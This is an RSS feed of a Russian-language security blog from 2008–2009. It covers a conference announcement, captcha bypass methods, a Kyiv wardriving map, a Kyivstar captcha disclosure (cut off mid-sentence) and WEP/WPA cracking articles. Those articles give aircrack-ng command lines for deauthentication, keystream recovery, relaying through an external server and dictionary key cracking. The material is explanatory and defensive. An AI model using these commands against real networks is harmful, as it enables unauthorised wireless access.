<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2russianfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Glaive Security Group</title>
	
	<link>http://glaive.org.ua</link>
	<description>Блог о компьютерной безопасности</description>
	<pubDate>Fri, 27 Mar 2009 09:13:55 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
	<language>en</language>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/glaive-security" type="application/rss+xml" /><feedburner:feedFlare href="http://add.my.yahoo.com/rss?url=http%3A%2F%2Ffeeds.feedburner.com%2Fglaive-security" src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif">Subscribe with My Yahoo!</feedburner:feedFlare><feedburner:feedFlare href="http://www.newsgator.com/ngs/subscriber/subext.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2Fglaive-security" src="http://www.newsgator.com/images/ngsub1.gif">Subscribe with NewsGator</feedburner:feedFlare><feedburner:feedFlare href="http://feeds.my.aol.com/add.jsp?url=http%3A%2F%2Ffeeds.feedburner.com%2Fglaive-security" src="http://o.aolcdn.com/favorites.my.aol.com/webmaster/ffclient/webroot/locale/en-US/images/myAOLButtonSmall.gif">Subscribe with My AOL</feedburner:feedFlare><feedburner:feedFlare href="http://www.bloglines.com/sub/http://feeds.feedburner.com/glaive-security" src="http://www.bloglines.com/images/sub_modern11.gif">Subscribe with Bloglines</feedburner:feedFlare><feedburner:feedFlare href="http://www.netvibes.com/subscribe.php?url=http%3A%2F%2Ffeeds.feedburner.com%2Fglaive-security" src="http://www.netvibes.com/img/add2netvibes.gif">Subscribe with Netvibes</feedburner:feedFlare><feedburner:feedFlare href="http://fusion.google.com/add?feedurl=http%3A%2F%2Ffeeds.feedburner.com%2Fglaive-security" src="http://buttons.googlesyndication.com/fusion/add.gif">Subscribe with Google</feedburner:feedFlare><feedburner:feedFlare href="http://www.pageflakes.com/subscribe.aspx?url=http%3A%2F%2Ffeeds.feedburner.com%2Fglaive-security" src="http://www.pageflakes.com/ImageFile.ashx?instanceId=Static_4&amp;fileName=ATP_blu_91x17.gif">Subscribe with Pageflakes</feedburner:feedFlare><feedburner:feedFlare href="http://lenta.yandex.ru/settings.xml?name=feed&amp;url=http%3A%2F%2Ffeeds.feedburner.com%2Fglaive-security" src="http://lenta.yandex.ru/i/addfeed.gif">?????? ? ??????.?????</feedburner:feedFlare><item>
		<title>Конференция CodeCamp 2009</title>
		<link>http://feedproxy.google.com/~r/glaive-security/~3/1qQNC9ZGbYw/</link>
		<comments>http://glaive.org.ua/news/365/codecamp09/#comments</comments>
		<pubDate>Fri, 27 Mar 2009 09:10:41 +0000</pubDate>
		<dc:creator>Vadim Chernysh</dc:creator>
		
		<category><![CDATA[News]]></category>

		<category><![CDATA[codecamp]]></category>

		<category><![CDATA[gsg]]></category>

		<category><![CDATA[Vulnerability]]></category>

		<category><![CDATA[конференция]]></category>

		<guid isPermaLink="false">http://glaive.org.ua/?p=365</guid>
		<description><![CDATA[Рады вам сообщить, дорогие читатели нашего блога, что наша организация проводит ИТ-конференцию CodeCamp 2009!

Конференция соберет более 500 специалистов и энтузиастов в сфере информационной безопасности и разработки программного обеспечения.
Приглашены докладчики из крупных компаний, таких как Microsoft, Sun Microsystems, Yandex, ПриватБанк, Энран Телеком, Samsung Electronics и другие, не менее известные компании.
Основные темы докладов:

технологии разработки программного обеспечения
структура проектов, [...]]]></description>
			<content:encoded><![CDATA[<p>Рады вам сообщить, дорогие читатели нашего блога, что наша организация проводит ИТ-конференцию <strong><a href="http://codecamp.org.ua" target="_blank">CodeCamp 2009</a></strong>!</p>
<p><a href="http://codecamp.org.ua"><img class="aligncenter" title="CodeСamp 2009. Киев, 28-29 марта" src="http://82.144.223.145/codecamp/templates/vj-22/images/CodeCamp1.jpg" alt="" width="200" height="110" /></a></p>
<p>Конференция соберет более 500 специалистов и энтузиастов в сфере информационной безопасности и разработки программного обеспечения.</p>
<p>Приглашены докладчики из крупных компаний, таких как Microsoft, Sun Microsystems, Yandex, ПриватБанк, Энран Телеком, Samsung Electronics и другие, не менее известные компании.</p>
<p>Основные темы докладов:</p>
<ul>
<li>технологии разработки программного обеспечения</li>
<li>структура проектов, процесс разработки</li>
<li>использование API и сервисов для разработки программ</li>
<li>командные проекты</li>
<li>аутсорсинг</li>
<li>сетевая и программная безопасность</li>
<li>безопасность корпоративных систем</li>
<li>уязвимости, анализ рисков</li>
<li>проблемы безопасности новых технологий</li>
<li>безопасность веб-проектов</li>
</ul>
<p>А также, благодаря нашим партнерам, в рамках конференции CodeCamp 09 пройдет два особенных события:</p>
<ul>
<li><strong>InnovationDay</strong>: Участники смогу презентовать свои инновационные идеи и проекты. Это предоставляет возможность привлечь к собственным проектам новых людей, продемонстрировать свои идеи широкой аудитории и найти потенциальных инвесторов.</li>
<li><strong>Sapka Developer Competition</strong>: соревнование для программистов,проходящее с 13 по 20 марта от организационного партнера Stanfy. Церемония награждения победителей пройдет в конце второго дня конференции.</li>
</ul>
<p>Конференция будет проходить в стенах Киевского Политехнического Института, 28 и 29 марта.</p>
<p>Ознакомится с расписанием можно по этой <a href="http://codecamp.org.ua/schedule" target="_blank">ссылке</a>.</p>
<p>Участвие в конференции бесплатное, после предварительной <strong><a href="http://codecamp.org.ua/register" target="_blank">регистрации.<br />
</a></strong></p>
<p>Будем рады вас видеть! Встретимся на конференции!</p>
<p><strong>Glaive Security Group</strong></p>
<img src="http://feeds.feedburner.com/~r/glaive-security/~4/1qQNC9ZGbYw" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://glaive.org.ua/news/365/codecamp09/feed/</wfw:commentRss>
		<feedburner:origLink>http://glaive.org.ua/news/365/codecamp09/</feedburner:origLink></item>
		<item>
		<title>Каптчи. Способы взлома и защиты</title>
		<link>http://feedproxy.google.com/~r/glaive-security/~3/OndBHJt8nWw/</link>
		<comments>http://glaive.org.ua/articles/329/security-captcha/#comments</comments>
		<pubDate>Mon, 23 Feb 2009 18:20:15 +0000</pubDate>
		<dc:creator>Vadim Chernysh</dc:creator>
		
		<category><![CDATA[Articles]]></category>

		<category><![CDATA[OCR]]></category>

		<category><![CDATA[glaive]]></category>

		<category><![CDATA[каптча]]></category>

		<category><![CDATA[тьюринг]]></category>

		<category><![CDATA[уязвимости]]></category>

		<guid isPermaLink="false">http://glaive.org.ua/?p=329</guid>
		<description><![CDATA[Ранее мы писали о уязвимостях каптч на сайтах компании Киевстар и Билайн. Теперь мы хотим, вашему вниманию предоставить наше исследование в области взломов и защиты каптч.

# Теория каптч
В 1950 году Алан Тьюринг написал статью «Вычислительные машины и разум», которая была опубликованная в философском журнале «Mind». В статье речь шла о неком тесте, который может различить [...]]]></description>
			<content:encoded><![CDATA[<p>Ранее мы писали о уязвимостях каптч на сайтах компании Киевстар и Билайн. Теперь мы хотим, вашему вниманию предоставить наше исследование в области взломов и защиты каптч.</p>
<p><span id="more-329"></span></p>
<h3># Теория каптч</h3>
<p>В 1950 году Алан Тьюринг написал статью «Вычислительные машины и разум», которая была опубликованная в философском журнале «Mind». В статье речь шла о неком тесте, который может различить человека от компьютера. Мы не будем описывать подробности о тесте, вы сами это сможете почитать на <a title="Википедии" href="http://ru.wikipedia.org/wiki/%D0%A2%D0%B5%D1%81%D1%82_%D0%A2%D1%8C%D1%8E%D1%80%D0%B8%D0%BD%D0%B3%D0%B0" target="_blank">Википедии</a></p>
<p>Так вот, каптча - это одна из реализаций теста Тьюринга, которая используется для того, что бы определить пользователя системы: человек он, или компьютер. Иными словами, каптча защищает сайт от спам-ботов, которые оставляют сообщения в гостевых книгах, в комментариях и т.д.</p>
<p>Реализаций каптч - тысячи. В основном, каптчи представляют собой некое изображение с текстом, который и нужно определить человеку. Вот несколько примеров современных каптч:</p>
<p><img class="alignnone size-medium wp-image-334" title="3d" src="http://glaive.org.ua/wp-content/uploads/2008/11/3d.png" alt="" width="300" height="150" /><img class="alignnone size-medium wp-image-331" title="beeline" src="http://glaive.org.ua/wp-content/uploads/2008/11/beeline.jpeg" alt="" width="50" height="20" /><img class="alignnone size-medium wp-image-332" title="captcha" src="http://glaive.org.ua/wp-content/uploads/2008/11/captcha.jpg" alt="" width="210" height="75" /><img class="alignnone size-medium wp-image-333" title="cp" src="http://glaive.org.ua/wp-content/uploads/2008/11/cp.jpg" alt="" width="572" height="83" /></p>
<h3># Уязвимости каптч</h3>
<p>Сразу ответим на вопрос: Зачем пытаются найти уязвимости в каптчах? Самая основная цель - спам. А там где спам - реклама. А реклама - деньги. Спамеры пишут программное обеспечение, например, которое массово рекламирует их клиентов на форумах(оставляя посты и приватные сообщения), в гостевых книгах, mail-гейтах и других сервисах. Они пишут программных ботов, которые имитируют действия человека. Для того, что бы предотвратить массовые сообщения, разработчики программного обеспечения используют каптчу. Это может быть open-source решение, или же &#8220;свое&#8221; или индивидуальное решение.  Используя любое из этих решений, программисты могут допускать ошибки. Это зависит от опытности программиста, но не всегда. Бывает каптча грамотно сделана, но присутствуют ошибки в настройке серверного программного обеспечения или же другие факторы.</p>
<p>Теперь рассмотрим несколько методов, c помощью которых можно обойти каптчу:</p>
<h4>1. Ошибки программиста</h4>
<p>Самая распространенная ошибка в реализации каптчи - так это её техническая реализация. Программист может упустить тонкие моменты в обработке результата. Например, текст каптчи может передаваться в сессии, или имя файла-изображения - и есть тот текст. Например, <a title="http://markitup.com/Captcha.ashx?txt=G-SG" href="http://markitup.com/Captcha.ashx?txt=G-SG" target="_self">http://markitup.com/Captcha.ashx?txt=G-SG</a> (PageRank этого сайта равен 5-ти)</p>
<h4>2. Оптическое распознавание символов</h4>
<p><strong>Оптическое распознавание символов </strong>(<strong>OCR</strong>)<strong> </strong>- электронная конвертация изображений символов и букв в текст, редактируемый на компьютере.</p>
<p>Самое простое  OCR  - эталонное. Заключается в самом обычном эталонном сравнении цифр(букв) на изображении.</p>
<p>Уязвимость такого рода очень редко встречается. Но попадается и на крупных сайтах. Пример тому - уязвимость каптчи на сайте Билайна.</p>
<h4>3. Плохая идея</h4>
<p>Суть метода: используется очень хорошая реализация каптчи( с использованием шума и т.п.), но к примеру, это цифирная или буквенная каптча из трёх знаков. В таком случае можно реальным брутфорсом подбирать ответ. Этот метод довольно эффективный, когда применяется нейро-сеть - она же бот-сеть, машин тупых зомби, которые пытаются угадать изображение.</p>
<h4>4.Человеческий разум</h4>
<p>Этот метод заключается в том, что за определение каптч платят деньги людям. Например, есть очень много отечественных сервисов, которые платят до 0.1$ за определение одной каптчи. Это реальная угроза, потому что противостоять этому тяжело.На этом методе построена целая индустрия.</p>
<h3># Защита каптч</h3>
<p>Существует очень много разных вариантов реализации каптч. Мы не будем описывать эти способы, но мы акцентируем ваше внимание на готовых решениях и нескольких советах.</p>
<p>При разработке каптчи нужно в первую очередь делать упор не на красоту, а сложность для автоматизированных ботов. Примером этому может быть каптча, используемая компанией <a href="http://google.com" target="_blank">Google</a> и <a href="http://bigmir-internet.com.ua" target="_blank">Bigmir-Internet</a> в своих проектах.</p>
<p>Безопасные каптчи нужно очень тщательно продумать. Обязательно использовать разного рода искажения текста(для картинок с циферками и текстом), качественную обработку на стороне сервера.</p>
<p>Также мы хотим вам предложить использовать готовые безопасные решения для организации каптчи на вашем веб-сайте, блоге и сервисе. Одно из таких - reCaptcha. Это уже довольно не новая технология каптч, основанная по клиент-серверным технологиям.<br />
Пример:</p>
<p>Довольно сложная для обхода капчта, и легкая для пользователя. Пользователю предлагается ввести два слова( или набор цыфр).  Вводимые значение по специальному API пересылаются на сервер reCaptcha, где проверяются и вашему обрабатываемому скрипту отправляют ответ: правильный ввод, или не правильный.<br />
Очень легко встраивается reCaptcha в популярные движки блогов, сайтов. А также есть библиотеки для разных языков программирования.</p>
<h3># Заключение</h3>
<p>На сегодняшний день существует большое количество видов каптч. Реализовывая тест Тьюринга в какой-либо форме мы не можем быть уверены в его надежности. Потому нужно использовать или готовые решения или же пользоваться услугами специалистов по безопасности, которые смогут проанализировать вашу реализацию и дать оценку безопасности.</p>
<p>Авторы: <strong>Черныш Вадим и Рыбалко Дмитрий</strong>, <em>Glaive Security Group</em></p>
<img src="http://feeds.feedburner.com/~r/glaive-security/~4/OndBHJt8nWw" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://glaive.org.ua/articles/329/security-captcha/feed/</wfw:commentRss>
		<feedburner:origLink>http://glaive.org.ua/articles/329/security-captcha/</feedburner:origLink></item>
		<item>
		<title>Атаки на беспроводные сети. Часть 3. WPA</title>
		<link>http://feedproxy.google.com/~r/glaive-security/~3/1XgTEztKozg/</link>
		<comments>http://glaive.org.ua/articles/307/wf-attack-3/#comments</comments>
		<pubDate>Sun, 23 Nov 2008 21:14:26 +0000</pubDate>
		<dc:creator>Yaroslav Kozhara</dc:creator>
		
		<category><![CDATA[Articles]]></category>

		<category><![CDATA[Vulnerability]]></category>

		<category><![CDATA[wi-fi]]></category>

		<guid isPermaLink="false">http://glaive.org.ua/?p=307</guid>
		<description><![CDATA[В третьей части цикла статей об атаках на беспроводные сети будут рассмотрены атаки на протокол, до последнего времени считавшийся достаточно безопасным - WPA.

1. WPA-TKIP
Вот уже больше недели внимание компьютерных и некоторых околокомпьютерных СМИ приковано к новой уязвимости в протоколе WPA-TKIP, обнаруженной исследователями и членами команды aircrack-ng Мартином Бэком и Эриком Тюзом. Постараемся ответить на вопрос, [...]]]></description>
			<content:encoded><![CDATA[<p>В третьей части цикла статей об атаках на беспроводные сети будут рассмотрены атаки на протокол, до последнего времени считавшийся достаточно безопасным - WPA.</p>
<p><span id="more-307"></span></p>
<p>1. WPA-TKIP</p>
<p>Вот уже больше недели внимание компьютерных и некоторых околокомпьютерных СМИ приковано к новой уязвимости в протоколе WPA-TKIP, обнаруженной исследователями и членами команды aircrack-ng Мартином Бэком и Эриком Тюзом. Постараемся ответить на вопрос, действительно ли это обозначает крах еще одной системы безопасности бепроводных сетей?</p>
<p>На самом деле, не все так плохо, ведь в результате експлуатации уязвимости основной ключ невозможно восстановить. Можно лишь узнать ключ используемый для проверки целостности и ключевой поток. На основании этого , не зная основного ключа, появляется возможность передавать пакеты в сеть. Получаются обратно пакеты по схема подобной easside-ng.</p>
<p>Уже сейчас эту уязвимость можно проверить используя тестовую программу tkiptun-ng добавленную в нестабильную ветку aircrack-ng несколько дней назад. Полные инструкции по использованию обещают скоро добавить. Пока что, лишь известно что для проведения атаки необходимо сменить MAC своего адаптера на MAC клиента, который атакуется.Также атакуемая точка доступа должна поддерживать QoS или WMM, использовать WPA + TKIP (не AES), и время смены временного ключа должно быть больше 3600 секунд. Если все это присутствует, то можно запускать:</p>
<p><em>tkiptun-ng  -h &lt;MAC адаптера&gt; -a &lt;MAC точки доступа&gt; -m 80 -n 100 &lt;интерфейс&gt;</em></p>
<p>После успешного исполнения, вы получите поток ключа с помощью которого можно создавать пакеты и запускать их в сеть.</p>
<p>На данный момент этим ограничивается функциональность tkiptun-ng. Недостаточно чтобы обьявить WPA-TKIP взломанным, но появляются основания задуматься о полном переходе на WPA2, который не подвержен этой уязвимости.</p>
<p>2.Класический взлом WPA</p>
<p>Второй метод намного старше и первые попытки его реализации появились еще в 2004 году с выходом в свет программы cowpatty. Суть атаки - в переборе всех возможных комбинаций ключа до его определения. Метод гарантирует успех, но если ключ достаточно длинный и не находиться в словарях, то можно считать себя защищенным от этой атаки. Зато, таким образом взламываются как wpa-tkip так и wpa2-ccmp сети, но лишь в PSK режиме. Эта атака встроена в пакет aircrack-ng.</p>
<p>Сначало нужно словить аутентификацию клиента, чтобы на основании ее уже восстанавливать основной ключ. Это проще всего сделать запустив <em>airodump-ng</em> и дождавшись аутентификации, либо запустив атаку деаутентификации (<em>aireplay-ng -0 &lt;количество деаутентификаций&gt;</em>)</p>
<p>Через некоторое время, airodump-ng покажет, что аутентификация словлена и записана в файл. После этого, нужно лишь запустить <em>aircrack-ng &lt;файл аутентификации&gt;</em> и ждать. Ускорить процесс можно используя большой словарь с часто используемыми словами. Еще убыстрить процесс поможет использование специализированных микроконтролеров или, как мы раньше описывали - <a href="http://glaive.org.ua/vulnerability/276/news-wf-1/" target="_blank">видеокарт</a> . Без этого перебор всех возможных ключей займет слишком много времени.</p>
<p>Так что, как и раньше, мы советуем использовать лишь WPA2 с достаточно длинным и необычным ключем.</p>
<img src="http://feeds.feedburner.com/~r/glaive-security/~4/1XgTEztKozg" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://glaive.org.ua/articles/307/wf-attack-3/feed/</wfw:commentRss>
		<feedburner:origLink>http://glaive.org.ua/articles/307/wf-attack-3/</feedburner:origLink></item>
		<item>
		<title>Атаки на беспроводные сети. Часть 2</title>
		<link>http://feedproxy.google.com/~r/glaive-security/~3/1KEY9bIJDl8/</link>
		<comments>http://glaive.org.ua/articles/295/wf-attack-2/#comments</comments>
		<pubDate>Mon, 17 Nov 2008 21:40:04 +0000</pubDate>
		<dc:creator>Yaroslav Kozhara</dc:creator>
		
		<category><![CDATA[Articles]]></category>

		<category><![CDATA[Projects]]></category>

		<category><![CDATA[Vulnerability]]></category>

		<category><![CDATA[WEP]]></category>

		<category><![CDATA[wi-fi]]></category>

		<guid isPermaLink="false">http://glaive.org.ua/?p=295</guid>
		<description><![CDATA[Во второй части цикла статей о безопасности беспроводных сетей мы рассмотрим некоторые нетрадиционные атаки на WEP.

В последней (нестабильной) версии пакета aircrack-ng добавилось несколько программ, реализующих новые атаки на WEP протокол.
Первая из них - wesside-ng. По сути - это скрипт, автоматизирующий взлом ключа. Программа имеет несколько параметров, но для работы необходимо просто передать ей имя используемого [...]]]></description>
			<content:encoded><![CDATA[<p>Во второй части цикла статей о безопасности беспроводных сетей мы рассмотрим некоторые нетрадиционные атаки на WEP.</p>
<p><span id="more-295"></span></p>
<p>В последней (нестабильной) версии пакета aircrack-ng добавилось несколько программ, реализующих новые атаки на WEP протокол.</p>
<p><strong>Первая из них - <a href="http://www.aircrack-ng.org/doku.php?id=wesside-ng" target="_blank">wesside-ng</a>.</strong> По сути - это скрипт, автоматизирующий взлом ключа. Программа имеет несколько параметров, но для работы необходимо просто передать ей имя используемого сетевого интерфейса:</p>
<p><em>wesside-ng -i wlan0</em></p>
<p>Алгоритм работы такой же как и при ручном взломе:</p>
<p>1. Прыгая по каналам, обнаруживается сеть с WEP.</p>
<p>2. Производится фальшивая аутентификация. Если включена фильтрация по MAC - изменяется адрес адаптера на допустимый.</p>
<p>3. Производится авторизация.</p>
<p>4. Фрагментационной атакой добывается 128 бит ключегого потока.</p>
<p>5. Словив ARP-пакет, IP адрес в его теле расшифровуется. На основании этих данных, а также ключегого потока - создается поддельный ARP-пакет.</p>
<p>6. Сеть наполняется фальшивыми ARP-пакетами.</p>
<p>7. Запускаеться ptw - атака для вычисления ключа.</p>
<p><strong>Вторая новая программа - <a href="http://www.aircrack-ng.org/doku.php?id=easside-ng" target="_blank">easside-ng</a>.</strong> Она позволяет подключаться к беспроводной сети с WEP не зная самого ключа.</p>
<div id="attachment_294" class="wp-caption alignnone" style="width: 510px"><a href="http://glaive.org.ua/wp-content/uploads/2008/11/diagram1.jpg"><img class="size-full wp-image-294" title="diagram1" src="http://glaive.org.ua/wp-content/uploads/2008/11/diagram1.jpg" alt="diagram1" width="500" height="220" /></a><p class="wp-caption-text">Схема работы easside-ng</p></div>
<p>Для реализации этой атаки, необходимо иметь возможность запустить компонент easside-ng - buddy-ng на сервере в интернете. Также, беспроводная сеть и компьютер с которого вы производите атаку, должны иметь возможность общаться с buddy-ng. Схема работы довольно проста:</p>
<p>1. Фрагментационной атакой добываеться ключевой поток максимально возможной длины (1504 бит).</p>
<p>2. Манипуляциями с ARP-пакетами узнаем адресацию сети.</p>
<p>3. Устанавливаются соединения с сервером и проверяется его производительность.</p>
<p>Дальше, для передачи пакета в сеть - он преобразовуется, используя ключевой поток, и отправляется.</p>
<p>Расшифровка полученного пакета происходит немного сложнее - сначало к нему добавляется информация, необходимая для доставки пакета серверу, и он отправляется обратно в беспроводную сеть. Точка доступа в свою очередь расшифровывает пакет и перенаправляет его в интернет. Сервер, получив пакет, отправит его вам, в открытом виде.</p>
<p>Эта атака очень тихая и быстрая, ведь не нужно отправлять десятки тысяч пакетов, что выгодно ее отличает от традиционной атаки на WEP.</p>
<p>Запускается программа очень просто:</p>
<p>На внешнем сервере - <em>buddy-ng</em></p>
<p>А на вашем компьютере - <em>easside-ng -f &lt;сетевой интерфейс&gt; -v &lt;MAC атакуемой точки&gt; -c &lt;канал точки&gt;  -s &lt;адрес внешнего сервера&gt;</em></p>
<p>И последнее нововведение - это новые опции в программе <a href="http://www.aircrack-ng.org/doku.php?id=airbase-ng#related_commands" target="_blank">aireplay-ng</a>. 2 новых параметра позволяют проводить атаки на клиентов, добывая WEP - ключ, вне радиуса действия соответствующей сети.</p>
<p><em>aireplay-ng  -6 -h &lt;MAC сетевой карты&gt; -D &lt;сетевой интерфейс&gt;</em> , для так называемой &#8220;Каффе - Латте&#8221; атаки, и</p>
<p><em>aireplay-ng  -7 -h &lt;MAC сетевой карты&gt; -D &lt;сетевой интерфейс&gt; , для &#8220;Хирте&#8221; атаки.</em></p>
<p>Обе из них выполняют одну функцию, но немного разными методами. Сначало ожидается ARP - запрос от любого клиента в радиусе действия сетевой карты. После этого, добывается ключевой поток небольшой длины и создаеться ARP - запрос, на который клиент будет отвечать.</p>
<p>Дальше запускается <em>airodump-ng</em>, собираются пакеты, и ключ вычисляется с помощью <em>aircrack-ng</em>.</p>
<p>Напоследок, стоит подметить, что эти новые виды атак, лишь еще больше упрощают взлом Wi-Fi сетей с WEP защитой. И единственным вариантом на сегодняшний день остается WPA2, PSK либо Enterprise.</p>
<p>В следующей статье, мы подробно рассмотрим возможности взлома WPA-защищенных сетей, а также новую атак на WPA-TKIP, и постараемся ответить на вопрос - действительно ли WPA уже не может предоставить полной уверенности в безопасности вашей беспроводной сети.</p>
<img src="http://feeds.feedburner.com/~r/glaive-security/~4/1KEY9bIJDl8" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://glaive.org.ua/articles/295/wf-attack-2/feed/</wfw:commentRss>
		<feedburner:origLink>http://glaive.org.ua/articles/295/wf-attack-2/</feedburner:origLink></item>
		<item>
		<title>Старая-новая угроза для WPA-PSK (оновлено)</title>
		<link>http://feedproxy.google.com/~r/glaive-security/~3/NWLhYcuhldc/</link>
		<comments>http://glaive.org.ua/vulnerability/276/news-wf-1/#comments</comments>
		<pubDate>Sun, 12 Oct 2008 20:24:42 +0000</pubDate>
		<dc:creator>Yaroslav Kozhara</dc:creator>
		
		<category><![CDATA[News]]></category>

		<category><![CDATA[Vulnerability]]></category>

		<category><![CDATA[wi-fi]]></category>

		<guid isPermaLink="false">http://glaive.org.ua/?p=276</guid>
		<description><![CDATA[
Как сообщили в компании Elcomsoft, им удалось многократно увеличить скорость взлома WPA-PSK ключей. Суть метода в распределенном использовании недорогих кластеров, состоящих из видеокарт NVIDIA, связанных их программным обеспечением для вычисления ключа. Этот метод применим не только для алгоритмов WPA и WPA2, но и для быстрого подбора md5 хешей, и для многих зашифрованных форматов файлов.
Угроза возможности [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://glaive.org.ua/wp-content/uploads/2008/10/wifi-copy.jpg"><img class="alignnone size-medium wp-image-277" title="wifi-copy" src="http://glaive.org.ua/wp-content/uploads/2008/10/wifi-copy.jpg" alt="" width="237" height="164" /></a></p>
<p>Как сообщили в компании <a href="http://www.elcomsoft.com/edpr.html" target="_blank">Elcomsoft</a>, им удалось многократно увеличить скорость взлома WPA-PSK ключей. <span id="more-276"></span>Суть метода в распределенном использовании недорогих кластеров, состоящих из видеокарт NVIDIA, связанных их программным обеспечением для вычисления ключа. Этот метод применим не только для алгоритмов WPA и WPA2, но и для быстрого подбора md5 хешей, и для многих зашифрованных форматов файлов.</p>
<p>Угроза возможности быстрого подбора wpa - ключей - очень опасна, так как часто используются простые, короткие ключи. <span style="text-decoration: line-through;">Но учитывая, что пока существует лишь платная реализации этого метода от Elcomsoft, то атаки на WPA </span><span style="text-decoration: line-through;">не должны принимать массового характера.</span> Четыре дня назад был запущен open-source проект <a href="http://code.google.com/p/pyrit/" target="_blank"><em><strong>pyrit</strong></em></a>, реализующий эту ж атаку. Разработка уже находиться на довольно развитой стадии.</p>
<p>Наша рекомендация - использовать либо длинные ключи, которые нельзя найти в словаре, либо использовать WPA2-Enterprise, где используется не статический PSK ключ, либо использовать поверх Wi-Fi VPN тунель, как дополнительный уровень защиты.</p>
<img src="http://feeds.feedburner.com/~r/glaive-security/~4/NWLhYcuhldc" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://glaive.org.ua/vulnerability/276/news-wf-1/feed/</wfw:commentRss>
		<feedburner:origLink>http://glaive.org.ua/vulnerability/276/news-wf-1/</feedburner:origLink></item>
		<item>
		<title>Обновление Wi-Fi карты Киева</title>
		<link>http://feedproxy.google.com/~r/glaive-security/~3/xZQT0Fb2VQk/</link>
		<comments>http://glaive.org.ua/projects/263/wifi-map-update1/#comments</comments>
		<pubDate>Sat, 04 Oct 2008 18:57:44 +0000</pubDate>
		<dc:creator>Yaroslav Kozhara</dc:creator>
		
		<category><![CDATA[News]]></category>

		<category><![CDATA[Projects]]></category>

		<category><![CDATA[Wardriving]]></category>

		<category><![CDATA[wi-fi]]></category>

		<guid isPermaLink="false">http://glaive.org.ua/?p=263</guid>
		<description><![CDATA[Мы обновили карту Wi-Fi сетей Киева. Теперь в ней 5236 точек доступа. Такое количество уже позволяет делать некоторые выводы. Пердоставляем общую статистике по защищенности:

Как видно на графике, большинство найденных нами сетей имеют недостаточную защищенность. WEP представляет собой даже большую угрозу безопасности чем открытые сети, так как в большинстве случаев, когда сеть открыта - это сделано [...]]]></description>
			<content:encoded><![CDATA[<p>Мы обновили <a href="http://glaive.org.ua/kiev-wifi-map/">карту Wi-Fi сетей Киева</a>. Теперь в ней 5236 точек доступа. Такое количество уже позволяет делать некоторые выводы. <span id="more-263"></span>Пердоставляем общую статистике по защищенности:</p>
<p><a href="http://glaive.org.ua/wp-content/uploads/2008/10/wireless-stats.jpg"><img class="alignnone size-medium wp-image-264" title="wireless-stats" src="http://glaive.org.ua/wp-content/uploads/2008/10/wireless-stats.jpg" alt="" width="374" height="285" /></a></p>
<p>Как видно на графике, большинство найденных нами сетей имеют недостаточную защищенность. WEP представляет собой даже большую угрозу безопасности чем открытые сети, так как в большинстве случаев, когда сеть открыта - это сделано намерено, а WEP создает илюзию защищенности и в такой сети может передаваться конфиденциальная информация. А насколько быстро и просто ключ WEP шифрования ломается, вы знаете по <a href="http://glaive.org.ua/articles/231/wireless-atacks/">предыдущей статье</a>. Сетей скрывающих свое имя довольно много, просто программа которой мы собираем данные (Kismet) оперативно эти имена раскрывает и выходной файл заполняеться с уже известными именами.</p>
<p>В следующем обновлении ожидайте статистики по районам, а также по производителям точек доступа.</p>
<img src="http://feeds.feedburner.com/~r/glaive-security/~4/xZQT0Fb2VQk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://glaive.org.ua/projects/263/wifi-map-update1/feed/</wfw:commentRss>
		<feedburner:origLink>http://glaive.org.ua/projects/263/wifi-map-update1/</feedburner:origLink></item>
		<item>
		<title>Обход защиты на сайте Киевстара</title>
		<link>http://feedproxy.google.com/~r/glaive-security/~3/23gSwQ1S2ls/</link>
		<comments>http://glaive.org.ua/vulnerability/227/kyivstarsms/#comments</comments>
		<pubDate>Tue, 30 Sep 2008 20:19:24 +0000</pubDate>
		<dc:creator>Yaroslav Kozhara</dc:creator>
		
		<category><![CDATA[OCR]]></category>

		<category><![CDATA[Vulnerability]]></category>

		<category><![CDATA[sms]]></category>

		<guid isPermaLink="false">http://glaive.org.ua/?p=227</guid>
		<description><![CDATA[Наша команда обнаружила на сайте украинского оператора мобильной связи &#8220;Киевстар&#8221; уязвимость в отправке коротких текстовых сообщений
(http://kyivstar.net/_sms/)

Она заключается в распознавании капчти. Это грозит тем, что
злоумышленник может
автоматически отправлять сообщения через этот сервис не выбирая картинки
&#8220;живой&#8221; природы.
Т.е осуществить спам-рассылку.
Для распознавания изображений нашей командой был придуман метод
&#8220;Квадрата&#8221;.
Суть метода:
Под квадратом имеется ввиду изображение которое нужно определить,
является оно или &#8220;живой&#8221; или [...]]]></description>
			<content:encoded><![CDATA[<p>Наша команда обнаружила на сайте украинского оператора мобильной связи &#8220;Киевстар&#8221; уязвимость в отправке коротких текстовых сообщений<br />
(<a href="http://kyivstar.net/_sms/" target="_blank">http://kyivstar.net/_sms/</a>)</p>
<p><span id="more-227"></span></p>
<p>Она заключается в распознавании капчти. Это грозит тем, что<br />
злоумышленник может<br />
автоматически отправлять сообщения через этот сервис не выбирая картинки<br />
&#8220;<em>живой</em>&#8221; природы.<br />
Т.е осуществить спам-рассылку.</p>
<p>Для распознавания изображений нашей командой был придуман метод<br />
&#8220;Квадрата&#8221;.</p>
<p>Суть метода:</p>
<p>Под квадратом имеется ввиду изображение которое нужно определить,<br />
является оно или &#8220;живой&#8221; или &#8220;не живой&#8221; природой.<br />
Мы проанализировали все картинки, которые предоставляются для выбора<br />
&#8220;живой&#8221; и &#8220;не живой&#8221; природы.<br />
Потом нужно взять восемь эталонных точек, которые расположены на бёдрах<br />
